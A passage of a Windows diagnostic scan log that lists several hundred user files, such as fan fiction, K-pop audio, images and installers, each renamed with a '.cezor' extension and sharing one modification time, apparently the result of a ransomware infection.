    2019-07-09 15:36 - 2019-02-15 21:18 - 000021823 _____ C:\Users\ADMIN\Downloads\Agmaio Macros (3).user.js.cezor
    2019-07-09 15:36 - 2019-02-15 21:17 - 000021823 _____ C:\Users\ADMIN\Downloads\Agmaio Macros.user.js.cezor
    2019-07-09 15:36 - 2019-02-15 21:17 - 000021823 _____ C:\Users\ADMIN\Downloads\Agmaio Macros (2).user.js.cezor
    2019-07-09 15:36 - 2019-02-15 21:17 - 000021823 _____ C:\Users\ADMIN\Downloads\Agmaio Macros (1).user.js.cezor
    2019-07-09 15:36 - 2019-02-03 21:52 - 000042526 _____ C:\Users\ADMIN\Downloads\Not Technically Lying.txt.cezor
    2019-07-09 15:36 - 2019-02-03 21:51 - 000087871 _____ C:\Users\ADMIN\Downloads\Not Technically Lying.pdf.cezor
    2019-07-09 15:36 - 2019-02-01 22:19 - 000227743 _____ C:\Users\ADMIN\Downloads\Introduction to ZeroSum Anthropology.pdf.cezor
    2019-07-09 15:36 - 2019-02-01 22:19 - 000137452 _____ C:\Users\ADMIN\Downloads\cool story bro.pdf.cezor
    2019-07-09 15:36 - 2019-02-01 22:19 - 000082866 _____ C:\Users\ADMIN\Downloads\gave your smile to me.pdf.cezor
    2019-07-09 15:36 - 2019-01-28 21:30 - 000092733 _____ C:\Users\ADMIN\Downloads\Its Nice to Finally Tweet.txt.cezor
    2019-07-09 15:36 - 2019-01-28 21:30 - 000032738 _____ C:\Users\ADMIN\Downloads\Praise Please.txt.cezor
    2019-07-09 15:36 - 2019-01-28 21:29 - 000209278 _____ C:\Users\ADMIN\Downloads\Its Nice to Finally Tweet.pdf.cezor
    2019-07-09 15:36 - 2019-01-28 21:28 - 000082607 _____ C:\Users\ADMIN\Downloads\Praise Please.pdf.cezor
    2019-07-09 15:36 - 2019-01-28 16:11 - 000788841 _____ C:\Users\ADMIN\Downloads\AutoClicker (1).exe.cezor
    2019-07-09 15:36 - 2019-01-26 21:15 - 000014835 _____ C:\Users\ADMIN\Downloads\lolidk.jpg.cezor
    2019-07-09 15:36 - 2019-01-26 14:54 - 000053967 _____ C:\Users\ADMIN\Downloads\jeon.jpg.cezor
    2019-07-09 15:36 - 2019-01-26 14:53 - 000296143 _____ C:\Users\ADMIN\Downloads\mari.png.cezor
    2019-07-09 15:36 - 2019-01-25 22:33 - 000084855 _____ C:\Users\ADMIN\Downloads\same.txt.cezor
    2019-07-09 15:36 - 2019-01-24 21:38 - 000069525 _____ C:\Users\ADMIN\Downloads\movie_65923_1080p_MPEG2.torrent.cezor
    2019-07-09 15:36 - 2019-01-24 21:32 - 000094152 _____ C:\Users\ADMIN\Downloads\Deeds.pdf.cezor
    2019-07-09 15:36 - 2019-01-24 21:32 - 000041076 _____ C:\Users\ADMIN\Downloads\Deeds.txt.cezor
    2019-07-09 15:36 - 2019-01-24 21:29 - 000124758 _____ C:\Users\ADMIN\Downloads\Fathom Me Out.txt.cezor
    2019-07-09 15:36 - 2019-01-24 21:29 - 000117117 _____ C:\Users\ADMIN\Downloads\Fools of Us All.pdf.cezor
    2019-07-09 15:36 - 2019-01-24 21:29 - 000065467 _____ C:\Users\ADMIN\Downloads\Fools of Us All.txt.cezor
    2019-07-09 15:36 - 2019-01-24 21:28 - 000188332 _____ C:\Users\ADMIN\Downloads\Fathom Me Out.pdf.cezor
    2019-07-09 15:36 - 2019-01-21 21:37 - 005281547 _____ C:\Users\ADMIN\Downloads\IZONE (아이즈원) - 라비앙로즈 (La Vie en Rose) MV.mp3.cezor
    2019-07-09 15:36 - 2019-01-21 21:34 - 000912213 _____ C:\Users\ADMIN\Downloads\A Modern Manservant.pdf.cezor
    2019-07-09 15:36 - 2019-01-21 21:34 - 000646747 _____ C:\Users\ADMIN\Downloads\A Modern Manservant.txt.cezor
    2019-07-09 15:36 - 2019-01-20 20:49 - 000171599 _____ C:\Users\ADMIN\Downloads\Dying to Return.pdf.cezor
    2019-07-09 15:36 - 2019-01-20 20:49 - 000115934 _____ C:\Users\ADMIN\Downloads\Dying to Return.txt.cezor
    2019-07-09 15:36 - 2019-01-18 15:59 - 000063845 _____ C:\Users\ADMIN\Downloads\Saved by Hufflepuff Friendship.txt.cezor
    2019-07-09 15:36 - 2019-01-18 15:57 - 000211666 _____ C:\Users\ADMIN\Downloads\Saved by Hufflepuff Friendship.pdf.cezor
    2019-07-09 15:36 - 2019-01-18 15:35 - 000131150 _____ C:\Users\ADMIN\Downloads\Pokemon - Emerald Version (U).sav.cezor
    2019-07-09 15:36 - 2019-01-18 15:20 - 000131150 _____ C:\Users\ADMIN\Downloads\1649 - Pokemon Emerald (J)(Independent).sav.cezor
    2019-07-09 15:36 - 2019-01-16 22:09 - 000365956 _____ C:\Users\ADMIN\Downloads\Police Dog.pdf.cezor
    2019-07-09 15:36 - 2019-01-16 22:09 - 000212460 _____ C:\Users\ADMIN\Downloads\Police Dog.txt.cezor
    2019-07-09 15:36 - 2019-01-16 22:05 - 000044978 _____ C:\Users\ADMIN\Downloads\dj.txt.cezor
    2019-07-09 15:36 - 2019-01-16 22:04 - 000119435 _____ C:\Users\ADMIN\Downloads\dj.pdf.cezor
    2019-07-09 15:36 - 2019-01-16 13:26 - 000227483 _____ C:\Users\ADMIN\Downloads\5 1.pdf.cezor
    2019-07-09 15:36 - 2019-01-16 13:26 - 000141421 _____ C:\Users\ADMIN\Downloads\5 1.txt.cezor
    2019-07-09 15:36 - 2019-01-15 21:33 - 005416966 _____ C:\Users\ADMIN\Downloads\G-DRAGON - 삐딱하게(CROOKED) MV.mp3.cezor
    2019-07-09 15:36 - 2019-01-15 21:32 - 005477153 _____ C:\Users\ADMIN\Downloads\G-DRAGON - 무제(無題) (Untitled 2014) MV.mp3.cezor
    2019-07-09 15:36 - 2019-01-15 19:45 - 000041904 _____ C:\Users\ADMIN\Downloads\potato.png.cezor
    2019-07-09 15:36 - 2019-01-14 21:01 - 000093427 _____ C:\Users\ADMIN\Downloads\anytime anyplace im thinking.pdf.cezor
    2019-07-09 15:36 - 2019-01-14 21:01 - 000044605 _____ C:\Users\ADMIN\Downloads\anytime anyplace im thinking.txt.cezor
    2019-07-09 15:36 - 2019-01-14 14:57 - 000119356 _____ C:\Users\ADMIN\Downloads\Biting Habit.pdf.cezor
    2019-07-09 15:36 - 2019-01-13 22:35 - 000203353 _____ C:\Users\ADMIN\Downloads\falling a photo essay by.pdf.cezor
    2019-07-09 15:36 - 2019-01-13 22:35 - 000116628 _____ C:\Users\ADMIN\Downloads\falling a photo essay by.txt.cezor
    2019-07-09 15:36 - 2019-01-13 22:31 - 000829028 _____ C:\Users\ADMIN\Downloads\G-DRAGON - '무제(無題) (Untitled, 2014)' MV.mp3.cezor
    2019-07-09 15:36 - 2019-01-13 20:00 - 000114944 _____ C:\Users\ADMIN\Downloads\ext-prod_n (1).zip.cezor
    2019-07-09 15:36 - 2019-01-13 19:57 - 000114944 _____ C:\Users\ADMIN\Downloads\ext-prod_n.zip.cezor
    2019-07-09 15:36 - 2019-01-13 13:47 - 000788841 _____ C:\Users\ADMIN\Downloads\AutoClicker.exe.cezor
    2019-07-09 15:36 - 2019-01-11 17:12 - 000302732 _____ C:\Users\ADMIN\Downloads\Dermis.pdf.cezor
    2019-07-09 15:36 - 2019-01-11 17:12 - 000188669 _____ C:\Users\ADMIN\Downloads\Dermis.txt.cezor
    2019-07-09 15:36 - 2019-01-09 21:47 - 003453692 _____ C:\Users\ADMIN\Downloads\robloxapp-20190109-2132031 (1).wmv.cezor
    2019-07-09 15:36 - 2019-01-09 21:34 - 003453692 _____ C:\Users\ADMIN\Downloads\robloxapp-20190109-2132031.wmv.cezor
    2019-07-09 15:36 - 2019-01-08 21:44 - 000946034 _____ C:\Users\ADMIN\Downloads\Deluge.pdf.cezor
    2019-07-09 15:36 - 2019-01-08 21:44 - 000583734 _____ C:\Users\ADMIN\Downloads\Deluge.txt.cezor
    2019-07-09 15:36 - 2019-01-06 21:33 - 001137507 _____ C:\Users\ADMIN\Downloads\Setup_TheFastestMouseClicker_2_1_3_7.exe.cezor
    2019-07-09 15:36 - 2019-01-06 16:22 - 000001392 _____ C:\Users\ADMIN\Downloads\lolid.jpg.cezor
    2019-07-09 15:36 - 2019-01-05 12:48 - 000046485 _____ C:\Users\ADMIN\Downloads\mom.jpg.cezor
    2019-07-09 15:36 - 2019-01-03 22:02 - 005619467 _____ C:\Users\ADMIN\Downloads\AJR - I'm Ready [Official Music Video].mp3.cezor
    2019-07-09 15:36 - 2019-01-03 22:01 - 005783098 _____ C:\Users\ADMIN\Downloads\EDEN - End Credits (feat. Leah Kelly).mp3.cezor
    2019-07-09 15:36 - 2019-01-02 21:40 - 005153024 _____ C:\Users\ADMIN\Downloads\EDEN - fumes (feat. gnash) (official audio).mp3.cezor
    2019-07-09 15:36 - 2019-01-02 21:39 - 007520345 _____ C:\Users\ADMIN\Downloads\EDEN - rock roll (official video).mp3.cezor
    2019-07-09 15:36 - 2019-01-02 21:38 - 000668777 _____ C:\Users\ADMIN\Downloads\Dissonance.txt.cezor
    2019-07-09 15:36 - 2019-01-02 21:36 - 001083259 _____ C:\Users\ADMIN\Downloads\Dissonance.pdf.cezor
    2019-07-09 15:36 - 2018-12-30 22:46 - 004227663 _____ C:\Users\ADMIN\Downloads\Demons - Imagine Dragons.mp3.cezor
    2019-07-09 15:36 - 2018-12-30 22:43 - 005452074 _____ C:\Users\ADMIN\Downloads\Forest Fires - Lauren Aquilina LYRICS.mp3.cezor
    2019-07-09 15:36 - 2018-12-30 16:23 - 000010007 _____ C:\Users\ADMIN\Downloads\faze.png.cezor
    2019-07-09 15:36 - 2018-12-30 16:11 - 017739726 _____ C:\Users\ADMIN\Downloads\bandicam.exe.cezor
    2019-07-09 15:36 - 2018-12-23 22:20 - 004482827 _____ C:\Users\ADMIN\Downloads\I Write Sins Not Tragedies With Lyrics.mp3.cezor
    2019-07-09 15:36 - 2018-12-23 22:18 - 005258350 _____ C:\Users\ADMIN\Downloads\Panic! At The Disco Emperor's New Clothes [OFFICIAL VIDEO].mp3.cezor
    2019-07-09 15:36 - 2018-12-23 22:17 - 006057070 _____ C:\Users\ADMIN\Downloads\Fun. We Are Young ft. Janelle Monáe [OFFICIAL VIDEO].mp3.cezor
    2019-07-09 15:36 - 2018-12-22 16:17 - 000509227 _____ C:\Users\ADMIN\Downloads\Patron Saint.pdf.cezor
    2019-07-09 15:36 - 2018-12-22 16:17 - 000343026 _____ C:\Users\ADMIN\Downloads\Patron Saint.txt.cezor
    2019-07-09 15:36 - 2018-12-18 21:43 - 000376769 _____ C:\Users\ADMIN\Downloads\A Fighting Chance.txt.cezor
    2019-07-09 15:36 - 2018-12-18 21:43 - 000042543 _____ C:\Users\ADMIN\Downloads\Shelter From Cold.txt.cezor
    2019-07-09 15:36 - 2018-12-18 21:42 - 000102691 _____ C:\Users\ADMIN\Downloads\Shelter From Cold.pdf.cezor
    2019-07-09 15:36 - 2018-12-18 21:40 - 000615815 _____ C:\Users\ADMIN\Downloads\A Fighting Chance.pdf.cezor
    2019-07-09 15:36 - 2018-12-15 23:03 - 000224305 _____ C:\Users\ADMIN\Downloads\And the Oscar goes to.pdf.cezor
    2019-07-09 15:36 - 2018-12-15 23:03 - 000126148 _____ C:\Users\ADMIN\Downloads\And the Oscar goes to.txt.cezor
    2019-07-09 15:36 - 2018-12-13 21:19 - 000253847 _____ C:\Users\ADMIN\Downloads\Setting Fire to a Stone.txt.cezor
    2019-07-09 15:36 - 2018-12-13 21:18 - 000375088 _____ C:\Users\ADMIN\Downloads\Setting Fire to a Stone.pdf.cezor
    2019-07-09 15:36 - 2018-12-12 23:10 - 000342867 _____ C:\Users\ADMIN\Downloads\Petey and Wade discuss the.pdf.cezor
    2019-07-09 15:36 - 2018-12-12 23:10 - 000204080 _____ C:\Users\ADMIN\Downloads\Petey and Wade discuss the.txt.cezor
    2019-07-09 15:36 - 2018-12-11 21:23 - 000178047 _____ C:\Users\ADMIN\Downloads\I Think I Missed a Step Cause.txt.cezor
    2019-07-09 15:36 - 2018-12-11 21:23 - 000123538 _____ C:\Users\ADMIN\Downloads\Said the Fly to the Spider.txt.cezor
    2019-07-09 15:36 - 2018-12-11 21:22 - 000211909 _____ C:\Users\ADMIN\Downloads\Said the Fly to the Spider.pdf.cezor
    2019-07-09 15:36 - 2018-12-10 20:41 - 005555519 _____ C:\Users\ADMIN\Downloads\Martin Garrix - Scared To Be Lonely (Lyrics Video) feat. Dua Lipa.mp3.cezor
    2019-07-09 15:36 - 2018-12-10 20:36 - 004931715 _____ C:\Users\ADMIN\Downloads\AJR - Weak (Lyrics) HQ.mp3.cezor
    2019-07-09 15:36 - 2018-12-10 20:10 - 000307753 _____ C:\Users\ADMIN\Downloads\I Think I Missed a Step Cause.pdf.cezor
    2019-07-09 15:36 - 2018-12-10 20:06 - 000120964 _____ C:\Users\ADMIN\Downloads\are you sure you wanna love.pdf.cezor
    2019-07-09 15:36 - 2018-12-09 22:12 - 001509096 _____ C:\Users\ADMIN\Downloads\Holding On.pdf.cezor
    2019-07-09 15:36 - 2018-12-09 22:10 - 008131611 _____ C:\Users\ADMIN\Downloads\EDEN - drugs (Lyric Video).mp3.cezor
    2019-07-09 15:36 - 2018-12-09 22:10 - 005588747 _____ C:\Users\ADMIN\Downloads\EDEN - crash (lyric video).mp3.cezor
    2019-07-09 15:36 - 2018-12-09 21:02 - 000075218 _____ C:\Users\ADMIN\Downloads\red_rudolf_reindeer_christmas_jumper.png.cezor
    2019-07-09 15:36 - 2018-12-09 21:00 - 000045088 _____ C:\Users\ADMIN\Downloads\download (40).png.cezor
    2019-07-09 15:36 - 2018-12-09 20:57 - 000009473 _____ C:\Users\ADMIN\Downloads\09f6c2df9809fba3d9056caeeb548664.jpg.cezor
    2019-07-09 15:36 - 2018-12-09 20:56 - 000272282 _____ C:\Users\ADMIN\Downloads\miyaya.png.cezor
    2019-07-09 15:36 - 2018-12-09 20:49 - 000480390 _____ C:\Users\ADMIN\Downloads\miya.png.cezor
    2019-07-09 15:36 - 2018-12-08 19:04 - 000366772 _____ C:\Users\ADMIN\Downloads\joohe.jpg.cezor
    2019-07-09 15:36 - 2018-12-08 19:01 - 000035506 _____ C:\Users\ADMIN\Downloads\jooh.jpg.cezor
    2019-07-09 15:36 - 2018-12-08 18:01 - 000076797 _____ C:\Users\ADMIN\Downloads\original.jpg.cezor
    2019-07-09 15:36 - 2018-12-08 14:50 - 000364823 _____ C:\Users\ADMIN\Downloads\DR4FXgXW4AISbbd.jpg_large.cezor
    2019-07-09 15:36 - 2018-12-08 14:50 - 000204051 _____ C:\Users\ADMIN\Downloads\chris.jpg.cezor
    2019-07-09 15:36 - 2018-12-08 14:47 - 000058673 _____ C:\Users\ADMIN\Downloads\christmas-aesthetic-background-resume-552-best-trees-images-on-pinterest-merry-love.jpg.cezor
    2019-07-09 15:36 - 2018-12-08 14:46 - 000113390 _____ C:\Users\ADMIN\Downloads\chrisjeno.jpg.cezor
    2019-07-09 15:36 - 2018-12-07 21:55 - 000188128 _____ C:\Users\ADMIN\Downloads\MEME.png.cezor
    2019-07-09 15:36 - 2018-12-07 17:56 - 000272952 _____ C:\Users\ADMIN\Documents\marki.docx.cezor
    2019-07-09 15:36 - 2018-12-07 17:56 - 000076358 _____ C:\Users\ADMIN\Downloads\marku.png.cezor
    2019-07-09 15:36 - 2018-12-07 17:52 - 000040477 _____ C:\Users\ADMIN\Downloads\mark3.jpg.cezor
    2019-07-09 15:36 - 2018-12-07 17:51 - 000043478 _____ C:\Users\ADMIN\Downloads\mark2.jpg.cezor
    2019-07-09 15:36 - 2018-12-07 17:50 - 000036533 _____ C:\Users\ADMIN\Downloads\mark1.jpg.cezor
    2019-07-09 15:36 - 2018-12-07 17:45 - 000105804 _____ C:\Users\ADMIN\Downloads\marko.jpg.cezor
    2019-07-09 15:36 - 2018-12-07 13:50 - 000192595 _____ C:\Users\ADMIN\Downloads\download (39).png.cezor
    2019-07-09 15:36 - 2018-12-07 13:49 - 000300342 _____ C:\Users\ADMIN\Documents\taey0ng.docx.cezor
    2019-07-09 15:36 - 2018-12-07 13:37 - 000072053 _____ C:\Users\ADMIN\Downloads\46c707557d2fda970ee4f6432be223fa.jpg.cezor
    2019-07-09 15:36 - 2018-12-06 22:51 - 000031717 _____ C:\Users\ADMIN\Documents\wonhoo.docx.cezor
    2019-07-09 15:36 - 2018-12-06 22:44 - 000089177 _____ C:\Users\ADMIN\Downloads\DtiUCAaUUAAtmES.jpg.cezor
    2019-07-09 15:36 - 2018-12-01 23:08 - 005078419 _____ C:\Users\ADMIN\Downloads\MONSTA X 몬스타엑스 'Shoot Out' MV.mp3.cezor
    2019-07-09 15:36 - 2018-12-01 23:04 - 000252153 _____ C:\Users\ADMIN\Downloads\Ill Be Your Man.pdf.cezor
    2019-07-09 15:36 - 2018-12-01 23:04 - 000139384 _____ C:\Users\ADMIN\Downloads\Ill Be Your Man.txt.cezor
    2019-07-09 15:36 - 2018-11-27 14:14 - 000674639 _____ C:\Users\ADMIN\Downloads\Mint and Poppy.txt.cezor
    2019-07-09 15:36 - 2018-11-27 14:14 - 000227460 _____ C:\Users\ADMIN\Downloads\lets make a deal lets make.pdf.cezor
    2019-07-09 15:36 - 2018-11-27 14:14 - 000121617 _____ C:\Users\ADMIN\Downloads\lets make a deal lets make.txt.cezor
    2019-07-09 15:36 - 2018-11-27 14:13 - 001000182 _____ C:\Users\ADMIN\Downloads\Mint and Poppy.pdf.cezor
    2019-07-09 15:36 - 2018-11-26 21:37 - 000056816 _____ C:\Users\ADMIN\Downloads\as the river belongs to the.pdf.cezor
    2019-07-09 15:36 - 2018-11-26 21:37 - 000018327 _____ C:\Users\ADMIN\Downloads\as the river belongs to the.txt.cezor
    2019-07-09 15:36 - 2018-11-26 13:29 - 000264122 _____ C:\Users\ADMIN\Downloads\No Mum He Really Is My Boyfriend.pdf.cezor
    2019-07-09 15:36 - 2018-11-26 13:29 - 000159089 _____ C:\Users\ADMIN\Downloads\No Mum He Really Is My Boyfriend.txt.cezor
    2019-07-09 15:36 - 2018-11-25 21:22 - 000264122 _____ C:\Users\ADMIN\Downloads\fic.pdf.cezor
    2019-07-09 15:36 - 2018-11-24 23:08 - 005409442 _____ C:\Users\ADMIN\Downloads\NCT 127 엔시티 127 'Simon Says' MV.mp3.cezor
    2019-07-09 15:36 - 2018-11-24 23:07 - 000208242 _____ C:\Users\ADMIN\Downloads\A Cure For Nightmares podfic.txt.cezor
    2019-07-09 15:36 - 2018-11-24 23:07 - 000115054 _____ C:\Users\ADMIN\Downloads\A Lie Gets Halfway Around.txt.cezor
    2019-07-09 15:36 - 2018-11-24 23:06 - 000359587 _____ C:\Users\ADMIN\Downloads\A Cure For Nightmares podfic.pdf.cezor
    2019-07-09 15:36 - 2018-11-24 23:06 - 000217096 _____ C:\Users\ADMIN\Downloads\A Lie Gets Halfway Around.pdf.cezor
    2019-07-09 15:36 - 2018-11-23 21:49 - 000300036 _____ C:\Users\ADMIN\Downloads\Long Live Living If Living.txt.cezor
    2019-07-09 15:36 - 2018-11-23 21:48 - 000480680 _____ C:\Users\ADMIN\Downloads\Long Live Living If Living.pdf.cezor
    2019-07-09 15:36 - 2018-11-22 22:36 - 005965537 _____ C:\Users\ADMIN\Downloads\Fall Out Boy - Uma Thurman.mp3.cezor
    2019-07-09 15:36 - 2018-11-22 22:35 - 005647679 _____ C:\Users\ADMIN\Downloads\LEGENDS NEVER DIE LYRICS LEAGUE OF LEGENDS.mp3.cezor
    2019-07-09 15:36 - 2018-11-21 21:27 - 006709086 _____ C:\Users\ADMIN\Downloads\EDEN - Wake Up.mp3.cezor
    2019-07-09 15:36 - 2018-11-20 22:51 - 001765320 _____ C:\Users\ADMIN\Downloads\Harry Potter and the Cursed.txt.cezor
    2019-07-09 15:36 - 2018-11-20 22:50 - 004795669 _____ C:\Users\ADMIN\Downloads\One Direction - They Don't Know About Us (Lyrics On Screen).mp3.cezor
    2019-07-09 15:36 - 2018-11-20 22:50 - 002554226 _____ C:\Users\ADMIN\Downloads\Harry Potter and the Cursed.pdf.cezor
    2019-07-09 15:36 - 2018-11-17 20:41 - 070728660 _____ C:\Users\ADMIN\Downloads\IGdm-Setup-2.5.4.exe.cezor
    2019-07-09 15:36 - 2018-11-14 12:52 - 009089862 _____ C:\Users\ADMIN\Downloads\GameDownload_PUBG_MOBILE_100103_1.0.5727.123 (2).exe.cezor
    2019-07-09 15:36 - 2018-11-14 12:40 - 009089862 _____ C:\Users\ADMIN\Downloads\GameDownload_PUBG_MOBILE_100103_1.0.5727.123 (1).exe.cezor
    2019-07-09 15:36 - 2018-11-12 22:37 - 000631593 _____ C:\Users\ADMIN\Downloads\All About Chemistry.pdf.cezor
    2019-07-09 15:36 - 2018-11-12 22:37 - 000419994 _____ C:\Users\ADMIN\Downloads\All About Chemistry.txt.cezor
    2019-07-09 15:36 - 2018-11-12 22:35 - 004866513 _____ C:\Users\ADMIN\Downloads\Ariana Grande - breathin.mp3.cezor
    2019-07-09 15:36 - 2018-11-11 21:30 - 004719183 _____ C:\Users\ADMIN\Downloads\Panic! At The Disco High Hopes [OFFICIAL VIDEO].mp3.cezor
    2019-07-09 15:36 - 2018-11-11 21:26 - 004979989 _____ C:\Users\ADMIN\Downloads\Ariana Grande - thank u, next (lyric video).mp3.cezor
    2019-07-09 15:36 - 2018-11-11 21:26 - 000120323 _____ C:\Users\ADMIN\Downloads\Ill Always Protect You.pdf.cezor
    2019-07-09 15:36 - 2018-11-11 21:26 - 000057901 _____ C:\Users\ADMIN\Downloads\Ill Always Protect You.txt.cezor
    2019-07-09 15:36 - 2018-11-06 15:37 - 457239062 _____ C:\Users\ADMIN\Downloads\BlueStacks-Installer_amd64_BS4_native_57d16fd0ed31e7b6abb5967f035ba87b.exe.cezor
    2019-07-09 15:36 - 2018-11-02 17:51 - 000102838 _____ C:\Users\ADMIN\Downloads\CU_EWVgWcAEBpxS.jpg.cezor
    2019-07-09 15:36 - 2018-11-02 17:51 - 000025065 _____ C:\Users\ADMIN\Downloads\CU_EWNKWIAQnES5.jpg.cezor
    2019-07-09 15:36 - 2018-11-02 16:51 - 000046541 _____ C:\Users\ADMIN\Downloads\41809117_170329003883724_2850388216022827008_n.jpg.cezor
    2019-07-09 15:36 - 2018-11-02 16:51 - 000037779 _____ C:\Users\ADMIN\Downloads\41696713_272479723384215_1153248952913494016_n.jpg.cezor
    2019-07-09 15:36 - 2018-11-02 16:24 - 000065614 _____ C:\Users\ADMIN\Downloads\Pokemon Black - Special Palace Edition 1 by MB Hacks (Red Hack) Goomba V2.2.sav.cezor
    2019-07-09 15:36 - 2018-10-29 21:53 - 000318044 _____ C:\Users\ADMIN\Downloads\Professional Couple Only.pdf.cezor
    2019-07-09 15:36 - 2018-10-29 21:53 - 000214103 _____ C:\Users\ADMIN\Downloads\Professional Couple Only.txt.cezor
    2019-07-09 15:36 - 2018-10-28 17:56 - 009089862 _____ C:\Users\ADMIN\Downloads\GameDownload_PUBG_MOBILE_100103_1.0.5727.123.exe.cezor
    2019-07-09 15:36 - 2018-10-28 17:29 - 002488742 _____ C:\Users\ADMIN\Downloads\PokemonEmeraldVersion_4058881702.exe.cezor
    2019-07-09 15:36 - 2018-10-28 11:31 - 000485142 _____ C:\Users\ADMIN\Downloads\Gravitys Got Nothing on You.txt.cezor
    2019-07-09 15:36 - 2018-10-28 11:31 - 000077020 _____ C:\Users\ADMIN\Downloads\Darling It Is No Joke.txt.cezor
    2019-07-09 15:36 - 2018-10-28 11:30 - 000764724 _____ C:\Users\ADMIN\Downloads\Gravitys Got Nothing on You.pdf.cezor
    2019-07-09 15:36 - 2018-10-28 11:30 - 000129949 _____ C:\Users\ADMIN\Downloads\Darling It Is No Joke.pdf.cezor
    2019-07-09 15:36 - 2018-10-22 17:28 - 000069538 _____ C:\Users\ADMIN\Downloads\download (38).png.cezor
    2019-07-09 15:36 - 2018-10-22 17:26 - 000774012 _____ C:\Users\ADMIN\Documents\oof.docx.cezor
    2019-07-09 15:36 - 2018-10-22 17:26 - 000301736 _____ C:\Users\ADMIN\Downloads\download (37).png.cezor
    2019-07-09 15:36 - 2018-10-22 17:25 - 000087554 _____ C:\Users\ADMIN\Downloads\download (36).png.cezor
    2019-07-09 15:36 - 2018-10-22 16:59 - 000358036 _____ C:\Users\ADMIN\Downloads\oof.png.cezor
    2019-07-09 15:36 - 2018-10-21 19:50 - 003451793 _____ C:\Users\ADMIN\Downloads\shoes.jpg.cezor
    2019-07-09 15:36 - 2018-10-21 18:45 - 004179388 _____ C:\Users\ADMIN\Downloads\benny blanco, Halsey & Khalid Eastside (official video).mp3.cezor
    2019-07-09 15:36 - 2018-10-21 18:36 - 005698461 _____ C:\Users\ADMIN\Downloads\Silk City, Dua Lipa - Electricity (Lyrics) ft. Diplo, Mark Ronson.mp3.cezor
    2019-07-09 15:36 - 2018-10-19 22:39 - 004576241 _____ C:\Users\ADMIN\Downloads\NCT 127 (엔시티 127) - 'TOUCH' Lyrics [Color CodedHanRomEng].mp3.cezor
    2019-07-09 15:36 - 2018-10-19 22:36 - 004542387 _____ C:\Users\ADMIN\Downloads\Dua Lipa BLACKPINK - Kiss and Make Up (Official Audio).mp3.cezor
    2019-07-09 15:36 - 2018-10-19 22:35 - 005252082 _____ C:\Users\ADMIN\Downloads\NCT 127 - REGULAR (레귤러) (Korean Ver.) Lyrics [Color Coded_Han_Rom_Eng].mp3.cezor
    2019-07-09 15:36 - 2018-10-19 22:34 - 000050223 _____ C:\Users\ADMIN\Downloads\ekek.txt.cezor
    2019-07-09 15:36 - 2018-10-19 22:33 - 000103567 _____ C:\Users\ADMIN\Downloads\ekek.pdf.cezor
    2019-07-09 15:36 - 2018-10-16 19:16 - 000037068 _____ C:\Users\ADMIN\Downloads\dark-transparent-tumblr-3.png.cezor
    2019-07-09 15:36 - 2018-10-16 17:37 - 000018063 _____ C:\Users\ADMIN\Downloads\image-2018-10-16 (1).jpg.cezor
    2019-07-09 15:36 - 2018-10-16 17:35 - 000078779 _____ C:\Users\ADMIN\Downloads\image-2018-10-16.jpg.cezor
    2019-07-09 15:36 - 2018-10-16 17:33 - 000051434 _____ C:\Users\ADMIN\Downloads\download (35).png.cezor
    2019-07-09 15:36 - 2018-10-16 17:30 - 000048047 _____ C:\Users\ADMIN\Downloads\download (34).png.cezor
    2019-07-09 15:36 - 2018-10-16 17:27 - 000047075 _____ C:\Users\ADMIN\Downloads\download (33).png.cezor
    2019-07-09 15:36 - 2018-10-16 17:27 - 000045758 _____ C:\Users\ADMIN\Downloads\download (32).png.cezor
    2019-07-09 15:36 - 2018-10-16 17:22 - 000032362 _____ C:\Users\ADMIN\Downloads\purepng.com-witch-hatwitchwitchcraftmagicbewitchingspell-1701527831890g6jfv.png.cezor
    2019-07-09 15:36 - 2018-10-16 17:20 - 000199304 _____ C:\Users\ADMIN\Downloads\download (31).png.cezor
    2019-07-09 15:36 - 2018-10-16 17:20 - 000199304 _____ C:\Users\ADMIN\Downloads\download (30).png.cezor
    2019-07-09 15:36 - 2018-10-16 17:20 - 000116632 _____ C:\Users\ADMIN\Documents\ok.docx.cezor
    2019-07-09 15:36 - 2018-10-16 17:20 - 000045758 _____ C:\Users\ADMIN\Downloads\download (29).png.cezor
    2019-07-09 15:36 - 2018-10-16 17:05 - 000076334 _____ C:\Users\ADMIN\Documents\spoopy.docx.cezor
    2019-07-09 15:36 - 2018-10-16 17:05 - 000045758 _____ C:\Users\ADMIN\Downloads\download (28).png.cezor
    2019-07-09 15:36 - 2018-10-16 16:45 - 000002754 _____ C:\Users\ADMIN\Downloads\627642-200.png.cezor
    2019-07-09 15:36 - 2018-10-16 16:44 - 000020421 _____ C:\Users\ADMIN\Downloads\original.gif.cezor
    2019-07-09 15:36 - 2018-10-15 16:55 - 000026131 _____ C:\Users\ADMIN\Documents\cuo.docx.cezor
    2019-07-09 15:36 - 2018-10-15 16:55 - 000021940 _____ C:\Users\ADMIN\Downloads\download (27).png.cezor
    2019-07-09 15:36 - 2018-10-15 16:52 - 000013968 _____ C:\Users\ADMIN\Downloads\download (26).png.cezor
    2019-07-09 15:36 - 2018-10-15 16:45 - 000146358 _____ C:\Users\ADMIN\Downloads\253747809015212.png.cezor
    2019-07-09 15:36 - 2018-10-15 16:45 - 000069004 _____ C:\Users\ADMIN\Downloads\cat-ears-and-whiskers-clipart.png.cezor
    2019-07-09 15:36 - 2018-10-15 16:44 - 000018211 _____ C:\Users\ADMIN\Downloads\cutie.jpeg.cezor
    2019-07-09 15:36 - 2018-10-15 16:41 - 000188474 _____ C:\Users\ADMIN\Downloads\cute.png.cezor
    2019-07-09 15:36 - 2018-10-15 16:27 - 001759657 _____ C:\Users\ADMIN\Downloads\jaemin pics (@najaeminpics) _ Twitter.html.cezor
    2019-07-09 15:36 - 2018-10-13 23:44 - 000105903 _____ C:\Users\ADMIN\Downloads\ok (1).jpg.cezor
    2019-07-09 15:36 - 2018-10-13 23:42 - 000039916 _____ C:\Users\ADMIN\Downloads\ok.jpg.cezor
    2019-07-09 15:36 - 2018-10-13 23:41 - 000059265 _____ C:\Users\ADMIN\Downloads\468489c32e51ccb534a439c7817d12f7.jpg.cezor
    2019-07-09 15:36 - 2018-10-13 23:38 - 000282916 _____ C:\Users\ADMIN\Downloads\572693.jpg.cezor
    2019-07-09 15:36 - 2018-10-13 23:37 - 000197836 _____ C:\Users\ADMIN\Downloads\large (1).png.cezor
    2019-07-09 15:36 - 2018-10-13 23:36 - 000041708 _____ C:\Users\ADMIN\Downloads\40553416_1845789622184411_5578044573709753109_n.jpg.cezor
    2019-07-09 15:36 - 2018-10-10 22:02 - 000661044 _____ C:\Users\ADMIN\Downloads\A Musical Matchmaking.txt.cezor
